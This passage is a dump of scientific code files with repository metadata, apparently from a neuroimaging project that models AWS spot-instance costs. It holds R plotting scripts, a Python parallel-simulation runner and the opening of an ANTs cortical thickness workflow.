$(date)\nexport ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS=8\npython /home/ubuntu/act_run.py $SGE_TASK_ID /mnt\necho \"End - TASKID \" $SGE_TASK_ID \" : \" $(date)\n" }, { "alpha_fraction": 0.5679012537002563, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 19.25, "blob_id": "4efc3095d2244d3635fecf82da5ddb99493547bb", "content_id": "0911a5ded293d2de0fae407e1f9be7a8444d53ef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 81, "license_type": "permissive", "max_line_length": 44, "num_lines": 4, "path": "/poster/README.md", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "AWS_OHBM2015_poster\n==============\n\nNDAR/AWS poster for the 2015 OHBM conference\n" }, { "alpha_fraction": 0.6309472918510437, "alphanum_fraction": 0.6545220613479614, "avg_line_length": 36.15286636352539, "blob_id": "0a2498c000ceb9f87e271e0d6551bd9c31d4b9e6", "content_id": "a99623aa973a5d502c61439e9b532b33a6561de6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 11665, "license_type": "permissive", "max_line_length": 146, "num_lines": 314, "path": "/spot-model/plot_static_times_costs.R", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# spot-model/plot_static_times_costs.R\n#\n# Author: Cameron Craddock, Daniel Clark (2015)\n\n# Import packages\nlibrary(ggplot2)\nlibrary(gridExtra)\nlibrary(plyr)\nlibrary(reshape2)\nlibrary(scales)\n\n\n# Populate regions with name formatted\nformat_region <- function(data_frame) 
{\n data_frame$region[grep('us-west-1',data_frame$av_zone)]='N. California'\n data_frame$region[grep('us-west-2',data_frame$av_zone)]='Oregon'\n data_frame$region[grep('us-east-1',data_frame$av_zone)]='N. Virginia'\n data_frame$region[grep('eu-west-1',data_frame$av_zone)]='Ireland'\n data_frame$region[grep('eu-central-1',data_frame$av_zone)]='Frankfurt'\n data_frame$region[grep('ap-southeast-1',data_frame$av_zone)]='Singapore'\n data_frame$region[grep('ap-southeast-2',data_frame$av_zone)]='Sydney'\n data_frame$region[grep('ap-northeast-1',data_frame$av_zone)]='Tokyo'\n data_frame$region[grep('sa-east-1',data_frame$av_zone)]='Sao Paulo'\n #data_frame$region=factor(data_frame$region)\n \n # Return the data frame with region header\n return(data_frame)\n}\n\n\n# Format cost/time vs num_ds/bid_ratio plots\nfactorize_region <- function(plot_obj) {\n \n # Add ggplot2 formatting to plot object\n frmt_plot <- plot_obj +\n geom_line() +\n facet_grid(region~., scales='free_y') +\n theme_bw() +\n theme(legend.position='None',\n axis.title.x=element_text(size=10, colour='black', vjust=-.8),\n axis.title.y=element_text(size=10, colour='black'),\n axis.text.x=element_text(size=8, colour='black', angle=0),\n axis.text.y=element_text(size=8, colour='black'),\n strip.text.y=element_text(size=8, colour='black'))\n \n # Return formatted plot\n return(frmt_plot)\n}\n\n\n# Format cost/time vs num_ds/bid_ratio plots\nbreakout_bid_ratios <- function(plot_obj) {\n \n # Add ggplot2 formatting to plot object\n frmt_plot <- plot_obj +\n facet_grid(bid_ratio~., scales='free_y') +\n theme_bw() +\n theme(legend.position='None',\n axis.title.x=element_text(size=10, colour='black', vjust=-.8),\n axis.title.y=element_text(size=10, colour='black'),\n axis.text.x=element_text(size=8, colour='black', angle=35),\n axis.text.y=element_text(size=8, colour='black'),\n strip.text.y=element_text(size=8, colour='black'))\n \n # Return formatted plot\n return(frmt_plot)\n}\n\n\n# Plot and print simulation results to pdf\nplot_ondemand <- function(df, out_file) {\n\n # Get on demand costs plot\n ondemand_cost <- ggplot(df, aes(x=num_datasets, y=on_demand_total_cost, col=region)) +\n labs(x='Number of datasets', y='Total cost ($)',\n title='On-demand costs') + geom_line()\n #ondemand_cost <- factorize_region(ondemand_cost)\n \n # Get on demand costs plot\n ondemand_time <- ggplot(df, aes(x=num_datasets, y=static_total_time/3600.0, col='all regions')) +\n labs(x='Number of datasets', y='Total time (hrs)',\n title='On-demand times') + geom_line()\n #ondemand_time <- factorize_region(ondemand_time)\n \n # Open pdf file to save plots to\n pdf(file=out_file, title='ondemand', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n # Set up the 2x2 grid\n grid.newpage()\n layout=grid.layout(2,1)\n pushViewport(viewport(layout=layout))\n \n # Print to pdf\n print(ondemand_cost, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n print(ondemand_time, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n \n # Shutdown printout device\n dev.off()\n}\n\n\n# Plot the costs vs times\nplot_cost_vs_times <- function(df, out_file) {\n on_demand <- ggplot(df, aes(x=static_total_time/3600.0,\n y=on_demand_total_cost, col=region)) +\n labs(x='Total time (hrs)', y='Total cost ($)', title='On-demand cost vs time') +\n geom_point(alpha=0.2)\n \n spot <- ggplot(df, aes(x=mean_total_time/3600.0, y=mean_total_cost, col=region)) +\n labs(x='Total time (hrs)', y='Total cost ($)', title='Mean spot cost vs time') +\n geom_point(alpha=0.2)\n \n 
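# (added usage sketch -- the csv/pdf paths are hypothetical, mirroring\n  # the driver code at the bottom of this script:\n  #   df <- read.csv('csvs/cpac_merged.csv'); df$region <- ''\n  #   plot_cost_vs_times_br(format_region(df), 'plots/cpac_br.pdf'))\n  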
pdf(file=out_file, title='time vs cost', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n grid.newpage()\n layout=grid.layout(2,1)\n pushViewport(viewport(layout=layout))\n \n print(on_demand, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n print(spot, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n \n dev.off()\n}\n\n\n# Plot spot history\nplot_history <- function(df, out_file) {\n df$Timestamp <- as.POSIXct(df$Timestamp)\n sh <- ggplot(df, aes(x=Timestamp, y=Spot.price, col=Availability.zone)) + geom_line() +\n scale_x_datetime(labels=date_format(format='%Y-%m')) + labs(x='Date', y='Spot price ($/hr)',\n title='Spot market history across regions')\n \n pdf(file=out_file, title='br', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n grid.newpage()\n layout=grid.layout(1,1)\n pushViewport(viewport(layout=layout))\n sh <- factorize_region(sh)\n print(sh, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n \n dev.off()\n}\n\n\n# \nplot_cost_vs_times_br <- function(df, out_file) {\n spot <- ggplot(df, aes(x=mean_total_time/3600.0, y=mean_total_cost, col=region)) +\n labs(x='Total time (hrs)', y='Total cost ($)', title='Mean spot cost vs time') +\n geom_point(alpha=0.2)\n \n pdf(file=out_file, title='time vs cost br', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n spot <- breakout_bid_ratios(spot)\n# grid.newpage()\n# layout=grid.layout(1,1)\n# pushViewport(viewport(layout=layout))\n \n print(spot)#, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n dev.off()\n}\n\n\ndata_summary <- function (x)\n{\n q=median_hilow(x, conf.int=.5)\n print(q)\n return(q)\n}\n\nplot_br_violin <- function(df, out_file) {\n br_time <- ggplot(df, aes(x=factor(bid_ratio), y=total_time/3600.0, col=bid_ratio)) +\n labs(x='Bid ratio', y='Total time (hrs)', title='A') +\n geom_violin(outlier.size=0,width=0.5,fill=\"white\") + stat_summary(aes(colour=bid_ratio), fun.data=data_summary, size=.5, geom=\"pointrange\")\n #+scale_y_continuous(limits=quantile(df$total_time/3600.0, c(0.1, 0.9)))\n br_cost <- ggplot(df, aes(x=factor(bid_ratio), y=total_cost, col=bid_ratio)) +\n labs(x='Bid ratio', y='Total cost ($)', title='B') +\n geom_boxplot(outlier.shape=NA) +\n #geom_violin(outlier.size=0,width=0.5,fill=\"white\") + stat_summary(aes(colour=bid_ratio), fun.data=data_summary, size=.5, geom=\"pointrange\") +\n scale_y_continuous(limits=quantile(df$total_cost, c(0.1, 0.9)))\n \n pdf(file=out_file, title='br', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n grid.newpage()\n layout=grid.layout(2,1)\n pushViewport(viewport(layout=layout))\n \n print(br_time, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n print(br_cost, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n \n dev.off()\n}\n\n\nplot_av_violin <- function(df, out_file) {\n\n av_time <- ggplot(df, aes(x=factor(av_zone), y=total_time/3600.0, col=region)) +\n labs(x='Avail. zone', y='Total time (hrs)', title='C') +\n #geom_boxplot() +\n geom_violin(outlier.size=0,width=0.5,fill=\"white\") + stat_summary(aes(colour=region), fun.data=data_summary, size=.5, geom=\"pointrange\") +\n theme(axis.text.x=element_blank()) #+ scale_y_continuous(limits=quantile(df$total_time/3600.0, c(0.1, 0.87)))\n av_cost <- ggplot(df, aes(x=factor(av_zone), y=total_cost, col=region)) +\n labs(x='Avail. 
zone', y='Total cost ($)', title='D') +\n geom_boxplot(outlier.shape=NA) +\n #geom_violin(outlier.size=0,width=0.5,fill=\"white\") + stat_summary(aes(colour=region), fun.data=data_summary, size=.5, geom=\"pointrange\") +\n theme(axis.text.x=element_blank()) + scale_y_continuous(limits=quantile(df$total_cost, c(0.1, 0.9)))\n pdf(file=out_file, title='av', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n grid.newpage()\n layout=grid.layout(2,1)\n pushViewport(viewport(layout=layout))\n\n print(av_time, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n print(av_cost, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n #print(legend, vp=viewport(layout.pos.row=1:2, layout.pos.col=2))\n \n dev.off()\n}\n\n\nplot_mean_vars_hist <- function(df, out_file) {\n \n mean_hist_time <- ggplot(df, aes(x=history_mean, y=mean_total_time/3600.0, col=region)) +\n labs(x='Mean history price ($)', y='Mean run time (hrs)', title='A') +\n geom_point(alpha=0.2) + theme(legend.position='none')\n mean_hist_cost <- ggplot(df, aes(x=history_mean, y=mean_total_cost, col=region)) +\n labs(x='Mean history price ($)', y='Mean total cost ($)', title='B') +\n geom_point(alpha=0.2)+ theme(legend.position='none')\n var_hist_time <- ggplot(df, aes(x=history_var, y=mean_total_time/3600.0, col=region)) +\n labs(x='Price history variance ($)', y='Mean run time (hrs)', title='C') +\n geom_point(alpha=0.2) + theme(legend.position='none')\n var_hist_cost <- ggplot(df, aes(x=history_var, y=mean_total_cost, col=region)) +\n labs(x='Price history variance ($)', y='Mean total cost ($)', title='D') +\n geom_point(alpha=0.2)+ theme(legend.position='none')\n \n pdf(file=out_file, title='av', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n grid.newpage()\n layout=grid.layout(2,2)\n pushViewport(viewport(layout=layout))\n \n print(mean_hist_time, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n print(mean_hist_cost, vp=viewport(layout.pos.row=1, layout.pos.col=2))\n print(var_hist_time, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n print(var_hist_cost, vp=viewport(layout.pos.row=2, 
layout.pos.col=2))\n \n dev.off()\n}\n\n\n\n# Init variables\n# Local dir of project base on computer\nproj_base_dir <- '~/Documents/projects/Clark2015_AWS'\n# Relative path of project csvs\nrel_csvs_dir <- 'spot-model/csvs'\n\n# Input parameters\n# Pipeline\npipeline <- 'cpac'\n# # Plotting parameters\n# bid_ratio = 2.5\n# num_datasets = 1000\n\n# Define csv\nmerged_csv <- file.path(proj_base_dir, rel_csvs_dir,\n paste(pipeline, '_merged.csv', sep=''))\n\n# Out pdf\nout_pdf <- file.path(proj_base_dir, 'spot-model/plots', paste(pipeline, '_ondemand.pdf', sep=''))\n\n# Load in sim vs stat dataframe\nmerged_df <- read.csv(merged_csv)\nmerged_df$region = ''\nregion_df <- format_region(merged_df)\n\n# Plot\nplot_ondemand(region_df, out_pdf)" }, { "alpha_fraction": 0.5987064242362976, "alphanum_fraction": 0.6087598204612732, "avg_line_length": 36.43157958984375, "blob_id": "3fadcae6afa4b6892ef16df3128d4b033eb66b25", "content_id": "5d398ce19bc7438098fdc5db84ef0c1591872b79", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 14224, "license_type": "permissive", "max_line_length": 106, "num_lines": 380, "path": "/spot-model/spot_sim_plots_Sw.R", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# spot-model/spot_sim_plots.R\n#\n# Author: Cameron Craddock, Daniel Clark (2015)\n\n# Import packages\nlibrary(ggplot2)\nlibrary(gridExtra)\nlibrary(plyr)\nlibrary(reshape2)\n\n# Create aggregated dataframe\naggregate_df <- function(csv, func_name) {\n\n # Read in dataframe\n print('Reading in full dataframe...')\n full_df <- read.csv(csv)\n\n # Check to see if mean or median\n print('Aggregating dataframe...')\n if (func_name == 'mean') {\n df_agg <- ddply(full_df, .(av_zone, bid_ratio, num_datasets), summarize,\n mean_instance_cost=mean(instance_cost),\n mean_num_interr=mean(num_interrupts),\n mean_pernode_cost=mean(per_node_cost),\n mean_run_time=mean(run_time),\n mean_total_cost=mean(total_cost),\n mean_total_time=mean(total_time),\n mean_wait_time=mean(wait_time))\n } else if (func_name == 'median') {\n df_agg <- ddply(full_df, .(av_zone, bid_ratio, num_datasets), summarize,\n median_instance_cost=median(instance_cost),\n median_num_interr=median(num_interrupts),\n median_pernode_cost=median(per_node_cost),\n median_run_time=median(run_time),\n median_total_cost=median(total_cost),\n median_total_time=median(total_time),\n median_wait_time=median(wait_time))\n }\n\n # Rename regions\n df_agg <- format_region(df_agg)\n\n # Return the aggregated dataframe\n return(df_agg)\n}\n\n\n# Populate regions with name formatted\nformat_region <- function(data_frame) {\n data_frame$region[grep('us-west-1',data_frame$av_zone)]='N. California'\n data_frame$region[grep('us-west-2',data_frame$av_zone)]='Oregon'\n data_frame$region[grep('us-east-1',data_frame$av_zone)]='N. 
Virginia'\n data_frame$region[grep('eu-west-1',data_frame$av_zone)]='Ireland'\n data_frame$region[grep('eu-central-1',data_frame$av_zone)]='Frankfurt'\n data_frame$region[grep('ap-southeast-1',data_frame$av_zone)]='Singapore'\n data_frame$region[grep('ap-southeast-2',data_frame$av_zone)]='Sydney'\n data_frame$region[grep('ap-northeast-1',data_frame$av_zone)]='Tokyo'\n data_frame$region[grep('sa-east-1',data_frame$av_zone)]='Sao Paulo'\n #data_frame$region=factor(data_frame$region)\n\n # Return the data frame with region header\n return(data_frame)\n}\n\n\n# Format cost/time vs num_ds/bid_ratio plots\nformat_cost_times <- function(plot_obj) {\n\n # Add ggplot2 formatting to plot object\n frmt_plot <- plot_obj +\n geom_line() +\n facet_grid(region~., scales='free_y') +\n theme_bw() +\n theme(legend.position='None',\n axis.title.x=element_text(size=10, colour='black', vjust=-.8),\n axis.title.y=element_text(size=10, colour='black'),\n axis.text.x=element_text(size=8, colour='black', angle=35),\n axis.text.y=element_text(size=8, colour='black'),\n strip.text.y=element_text(size=8, colour='black'))\n\n # Return formatted plot\n return(frmt_plot)\n}\n\n\n# Plot and print simulation results to pdf\nplot_cost_times <- function(agg_df, num_ds, bid_rat, out_file) {\n ## Ceiling costs to round to the nearest dollar\n fixed_ds_df <- subset(agg_df, num_datasets==num_ds)\n # Cost vs. Bid ratio\n cost_br <- ggplot(fixed_ds_df,\n aes(x=bid_ratio, y=ceiling(mean_total_cost), col=av_zone)) +\n labs(x='Bid ratio', y='Cost ($)',\n title=paste('Cost vs bid ratio, datasets = ', num_ds))\n cost_br <- cost_br + geom_hline(aes(yintercept=on_demand_total_cost))\n cost_br <- format_cost_times(cost_br)\n\n # Cost vs. Num datasets\n cost_ds <- ggplot(subset(agg_df, bid_ratio==bid_rat),\n aes(x=num_datasets, y=ceiling(mean_total_cost), col=av_zone)) +\n labs(x='Number of datasets', y='Cost ($)',\n title=paste('Cost vs datasets, bid ratio = ', bid_rat))\n cost_ds <- format_cost_times(cost_ds)\n\n # Time vs. Bid ratio\n time_br <- ggplot(subset(agg_df, num_datasets==num_ds),\n aes(x=bid_ratio, y=mean_total_time/3600, col=av_zone)) +\n labs(x='Bid ratio', y='Time (hours)',\n title=paste('Time vs bid ratio, datasets = ', num_ds))\n time_br <- time_br + geom_hline(aes(yintercept=static_total_time/3600.0))\n time_br <- format_cost_times(time_br)\n\n # Time vs. Num datasets\n time_ds <- ggplot(subset(agg_df, bid_ratio==bid_rat),\n aes(x=num_datasets, y=mean_total_time/3600, col=av_zone)) +\n labs(x='Number of datasets', y='Time (hours)',\n title=paste('Time vs datasets, bid ratio = ', bid_rat))\n time_ds <- format_cost_times(time_ds)\n\n # Open pdf file to save plots to\n pdf(file=out_file, title='sim_results', width=180/25.4, height=8,\n family='ArialMT', paper='special')\n\n # Set up the 1x2 grid\n grid.newpage()\n layout=grid.layout(1,2)\n pushViewport(viewport(layout=layout))\n\n # Print to pdf\n print(cost_br, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n #print(cost_ds, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n print(time_br, vp=viewport(layout.pos.row=1, layout.pos.col=2))\n #print(time_ds, vp=viewport(layout.pos.row=2, layout.pos.col=2))\n\n # Shutdown printout device\n dev.off()\n}\n\n# Plot and print simulation results to pdf\nplot_tradeoffs <- function(agg_df, num_ds, bid_rat, out_file) {\n ## Ceiling costs to round to the nearest dollar\n fixed_ds_df <- subset(agg_df, num_datasets==num_ds)\n\n # Time/cost vs. Bid ratio\n time_to <- ggplot(fixed_ds_df,\n aes(x=bid_ratio, y=time_to_cost, col=av_zone)) +\n labs(x='Bid ratio', y='Cost ($)',\n title=paste('Time/cost vs bid ratio, datasets = ', num_ds))\n time_to <- time_to + geom_hline(aes(yintercept=time_to_cost_od))\n time_to <- format_cost_times(time_to)\n \n # Time/cost vs. Bid ratio\n time_pl <- ggplot(fixed_ds_df,\n aes(x=bid_ratio, y=time_plus_cost, col=av_zone)) +\n labs(x='Bid ratio', y='Cost ($)',\n title=paste('Time/cost vs bid ratio, datasets = ', num_ds))\n time_pl <- time_pl + geom_hline(aes(yintercept=time_plus_cost_od))\n time_pl <- format_cost_times(time_pl)\n\n # Open pdf file to save plots to\n pdf(file=out_file, title='sim_results', width=180/25.4, height=8,\n family='ArialMT', paper='special')\n \n # Set up the 1x2 grid\n grid.newpage()\n layout=grid.layout(1,2)\n pushViewport(viewport(layout=layout))\n \n # Print to pdf\n print(time_to, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n #print(cost_ds, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n print(time_pl, vp=viewport(layout.pos.row=1, layout.pos.col=2))\n #print(time_ds, vp=viewport(layout.pos.row=2, layout.pos.col=2))\n \n # Shutdown printout device\n dev.off()\n}\n\n\n# Plot correlation plots for costs and times\nplot_correlations <- function(sim_stat_df, bid_rat, pipeline) {\n # Plot\n # Average sim vs static costs\n sim_vs_stat_cost <- ggplot(subset(sim_stat_df, bid_ratio==bid_rat), \n aes(x=static_total_cost, y=mean_total_cost,\n color=factor(region), size=factor(num_datasets))) +\n labs(x='Static model total cost ($)',\n y='Mean simulation total cost ($)',\n title=paste('Mean simulation costs vs Static model costs, bid ratio =',\n bid_rat)) +\n geom_point(alpha=2/10)\n # Write out to pdf\n pdf(file=file.path(proj_base_dir, 'spot-model/plots',\n paste(pipeline, '_mean_sim_vs_static_costs.pdf', sep='')),\n width=11, height=8)\n print(sim_vs_stat_cost)\n dev.off()\n\n # Average sim vs static times\n sim_vs_stat_time <- ggplot(subset(sim_stat_df, bid_ratio==bid_rat),\n aes(x=static_total_time/3600,y=mean_total_time/3600,\n color=factor(region), size=factor(num_datasets))) +\n labs(x='Static model total time (hrs)',\n y='Mean simulation total time (hrs)',\n title=paste('Mean simulation time vs Static model time, bid ratio =',\n bid_rat)) +\n geom_point(alpha=2/10)\n # Write out to pdf\n pdf(file=file.path(proj_base_dir, 'spot-model/plots',\n paste(pipeline, '_mean_sim_vs_static_times.pdf', sep='')),\n width=11, height=8)\n print(sim_vs_stat_time)\n dev.off()\n}\n\n\n# Plot correlation plots for costs\nplot_cost_ratio <- function(sim_stat_df, pipeline, bid_rat, num_ds, itr, x_axis) {\n\n # Ratio vs bid ratio\n if (x_axis == 'bid_ratio') {\n # Get only dataframe at fixed number of datasets\n subset_df <- subset(sim_stat_df, num_datasets==num_ds)\n\n # Average sim vs static costs\n cost_ratio_plot <- ggplot(subset_df, aes(x=bid_ratio, y=cost_ratio,\n color=factor(region))) +\n labs(x='Bid ratio',\n y='Static cost to mean simulation cost ratio',\n title=paste(pipeline, ' - cost ratio vs bid ratio, num datasets =',\n num_ds)) +\n geom_point(alpha=2/10)\n\n }\n\n # Ratio vs num datasets\n else if (x_axis == 'num_datasets') {\n # Get only dataframe at fixed bid ratio\n subset_df <- subset(sim_stat_df, bid_ratio==bid_rat)\n\n # Average sim vs static costs\n cost_ratio_plot <- ggplot(subset_df, aes(x=num_datasets, y=cost_ratio,\n color=factor(region))) +\n labs(x='Number of datasets',\n y='Static cost to mean simulation cost ratio',\n title=paste(pipeline, ' - cost ratio vs number of datasets, bid ratio =',\n bid_rat, sep='')) +\n geom_point(alpha=2/10)\n\n }\n return(cost_ratio_plot)\n\n}\n\n# Plot correlation plots for times\nplot_time_ratio <- function(sim_stat_df, pipeline, bid_rat, num_ds, itr, x_axis) {\n\n # Ratio vs bid ratio\n if (x_axis == 'bid_ratio') {\n # Get only dataframe at fixed number of datasets\n subset_df <- subset(sim_stat_df, num_datasets==num_ds)\n\n # Average sim vs static costs\n time_ratio_plot <- ggplot(subset_df, aes(x=bid_ratio, y=time_ratio,\n color=factor(region))) +\n labs(x='Bid ratio',\n y='Static runtime to mean simulation runtime ratio',\n title=paste(pipeline, ' - time ratio vs bid ratio, num datasets =',\n num_ds)) +\n geom_point(alpha=2/10)\n }\n\n # Ratio vs num datasets\n else if (x_axis == 'num_datasets') {\n # Get only dataframe at fixed bid ratio\n subset_df <- subset(sim_stat_df, bid_ratio==bid_rat)\n\n # Average sim vs static costs\n time_ratio_plot <- ggplot(subset_df, aes(x=num_datasets, y=time_ratio,\n color=factor(region))) +\n labs(x='Number of datasets',\n y='Static runtime to mean simulation runtime ratio',\n title=paste(pipeline, ' - time ratio vs number of datasets, bid ratio =',\n bid_rat)) +\n geom_point(alpha=2/10)\n }\n\n return(time_ratio_plot)\n}\n\n\n# Init variables\n# Local dir of project base on computer\nproj_base_dir <- '~/Documents/projects/Clark2015_AWS'\n# Relative path of project csvs\nrel_csvs_dir <- 'spot-model/csvs'\n\n# Input parameters\n# Pipeline\npipeline <- 'ants'\n# Plotting parameters\nbid_ratio = 2.5\nnum_datasets = 1000\n\n# Define csv\nsim_stat_csv <- file.path(proj_base_dir, rel_csvs_dir,\n paste(pipeline, '_merged.csv', sep=''))\n\n# Load in sim vs stat dataframe\nsim_stat_df <- read.csv(sim_stat_csv)\n\nsim_stat_df$region = ''\nregion_df <- format_region(sim_stat_df)\n\n# To write out plots\nplot_cost_times(region_df, num_datasets, bid_ratio,\n file.path(proj_base_dir, 'spot-model/plots',\n paste(pipeline,'_sim_mean.pdf', sep='')))\n\n# Plot the correlations between simulations and static models\nplot_correlations(region_df, bid_ratio, pipeline)\n\n# Iterate over pipelines for plots\npipelines <- c('ants', 'cpac', 'fs')\nfor (p_idx in 1:3) {\n # Init pipeline\n pipeline <- pipelines[p_idx]\n\n # Define csv\n sim_stat_csv <- file.path(proj_base_dir, rel_csvs_dir,\n paste(pipeline, '_avg_sims_and_static.csv', sep=''))\n # Load in sim vs stat dataframe\n sim_stat_df <- read.csv(sim_stat_csv)\n\n # Make plots\n # Plot cost and times vs bid ratio and num datasets\n plot_cost_times(sim_stat_df, num_datasets, bid_ratio,\n file.path(proj_base_dir, 'spot-model/plots',\n paste(pipeline,'_sim_mean.pdf', sep='')))\n\n # Plot the correlations between simulations and static models\n plot_correlations(sim_stat_df, bid_ratio, pipeline)\n\n # Plot ratios vs bid ratios\n cost_plot_br <- plot_cost_ratio(sim_stat_df, pipeline, bid_ratio, num_datasets, p_idx, 'bid_ratio')\n time_plot_br <- plot_time_ratio(sim_stat_df, pipeline, bid_ratio, num_datasets, p_idx, 'bid_ratio')\n if (p_idx == 1) {\n # Open pdf file to save plots to\n pdf(file=paste('~/bid_ratio.pdf'), width=24, height=8)\n # Set up the 2x3 grid\n grid.newpage()\n layout=grid.layout(2,3)\n pushViewport(viewport(layout=layout))\n }\n # Print to pdf\n print(cost_plot_br, vp=viewport(layout.pos.row=1, layout.pos.col=p_idx))\n print(time_plot_br, vp=viewport(layout.pos.row=2, layout.pos.col=p_idx))\n # Write out to pdf\n if (p_idx == 3) {\n dev.off()\n }\n\n# # Plot 
ratios vs num datasets\n# cost_plot_ds <- plot_cost_ratio(sim_stat_df, pipeline, bid_ratio, num_datasets, p_idx, 'num_datasets')\n# time_plot_ds <- plot_time_ratio(sim_stat_df, pipeline, bid_ratio, num_datasets, p_idx, 'num_datasets')\n# # Open pdf file to save plots to\n# if (p_idx == 1) {\n# pdf(file=paste('~/num_datasets.pdf'), width=24, height=8)\n# # Set up the 2x3 grid\n# grid.newpage()\n# layout=grid.layout(2,3)\n# pushViewport(viewport(layout=layout))\n# }\n# # Print to pdf\n# print(cost_plot_ds, vp=viewport(layout.pos.row=1, layout.pos.col=p_idx))\n# print(time_plot_ds, vp=viewport(layout.pos.row=2, layout.pos.col=p_idx))\n# if (p_idx == 3) {\n# dev.off()\n# }\n}\n" }, { "alpha_fraction": 0.5513840317726135, "alphanum_fraction": 0.5539293885231018, "avg_line_length": 30.118812561035156, "blob_id": "e4cfbf205fdf532120e4c57d1ad8b736cde709db", "content_id": "41315c2a680dd44cd92201634dd92f95e92dfb5c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3143, "license_type": "permissive", "max_line_length": 80, "num_lines": 101, "path": "/spot-model/run_spot_sims.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# run_spot_sims.py\n#\n# Author: Daniel Clark\n\n'''\nScript to run AWS simulation for a given configuration file in parallel\n\nUsage:\n python run_spot_sims.py -c <config_file> -n <num_cores>\n -o <out_dir> -s <spot_csv>\n'''\n\n# Build processing list\ndef build_proc_list(config_file, out_dir, spot_csv):\n '''\n Build a list of spot_price_model.main processes\n\n Parameters\n ----------\n config_file : string\n filepath to the spot model configuration file\n out_dir : string\n directory to output the results of the simulations\n spot_csv : string\n filepath to the spot history csv file\n\n Returns\n -------\n proc_list : list\n list of multiprocessing.Process objects that run the simulation\n '''\n\n # Import packages\n import utils\n import yaml\n from multiprocessing import Process\n\n # Import local modules\n import record_spot_price\n import spot_price_model\n\n # Init variables\n proc_list = []\n config_dict = yaml.load(open(config_file, 'r'))\n\n # Build processing list\n for avz in config_dict['av_zone']:\n for br in config_dict['bid_ratio']:\n for nj in config_dict['num_jobs']:\n proc = Process(target=spot_price_model.main,\n args=(out_dir, config_dict['proc_time'], nj,\n config_dict['jobs_per'],\n config_dict['in_gb'],\n config_dict['out_gb'],\n config_dict['out_gb_dl'],\n config_dict['up_rate'],\n config_dict['down_rate'], br,\n config_dict['instance_type'], avz,\n config_dict['product'], spot_csv, None))\n proc_list.append(proc)\n\n # Return process list\n return proc_list\n\n\n# Make module executable\nif __name__ == '__main__':\n\n # Import packages\n import argparse\n\n # Import local modules\n import utils\n\n # Init argparser\n parser = argparse.ArgumentParser(description=__doc__)\n\n # Required arguments\n parser.add_argument('-c', '--config_file', nargs=1, required=True,\n type=str, help='Path to AWS sim configuration file')\n parser.add_argument('-n', '--num_cores', nargs=1, required=True,\n type=int, help='Number of cores to run at once')\n parser.add_argument('-o', '--out_dir', nargs=1, required=True,\n type=str, help='Output base directory to store results')\n parser.add_argument('-s', '--spot_csv', nargs=1, required=True,\n type=str, help='Path to spot history csv')\n\n # Parse arguments\n args = parser.parse_args()\n\n # Init variables\n 
config_file = args.config_file[0]\n num_cores = args.num_cores[0]\n out_dir = args.out_dir[0]\n spot_csv = args.spot_csv[0]\n\n # Build processing list\n proc_list = build_proc_list(config_file, out_dir, spot_csv)\n\n # Run jobs in parallel\n utils.run_in_parallel(proc_list, num_cores)\n" }, { "alpha_fraction": 0.6262981295585632, "alphanum_fraction": 0.6331658363342285, "avg_line_length": 31.2702693939209, "blob_id": "b7cdbb28fdc8ea472b17f47adc1933e3de2b44a8", "content_id": "6deedab5c251a8328a5cfc6e102257bec32d7345", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11940, "license_type": "permissive", "max_line_length": 107, "num_lines": 370, "path": "/data-preproc/scripts/act_run.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# act_run.py\n#\n# Author: Daniel Clark, 2015\n\n'''\nThis module contains functions which run antsCorticalThickness and ROI\nextractions and then uploads them to S3\n'''\n\n# Create the ACT nipype workflow\ndef create_workflow(wf_base_dir, input_anat, oasis_path):\n '''\n Method to create the nipype workflow that is executed for\n preprocessing the data\n\n Parameters\n ----------\n wf_base_dir : string\n filepath to the base directory to run the workflow\n input_anat : string\n filepath to the input file to run antsCorticalThickness.sh on\n oasis_path : string\n filepath to the oasis\n\n Returns\n -------\n wf : nipype.pipeline.engine.Workflow instance\n the workflow to be ran for preprocessing\n '''\n\n # Import packages\n from act_interface import antsCorticalThickness\n import nipype.interfaces.io as nio\n import nipype.pipeline.engine as pe\n import nipype.interfaces.utility as util\n from nipype.interfaces.utility import Function\n from nipype import logging as np_logging\n from nipype import config\n import os\n\n # Init variables\n oasis_trt_20 = os.path.join(oasis_path,\n 'OASIS-TRT-20_jointfusion_DKT31_CMA_labels_in_OASIS-30.nii')\n\n # Setup nipype workflow\n if not os.path.exists(wf_base_dir):\n os.makedirs(wf_base_dir)\n 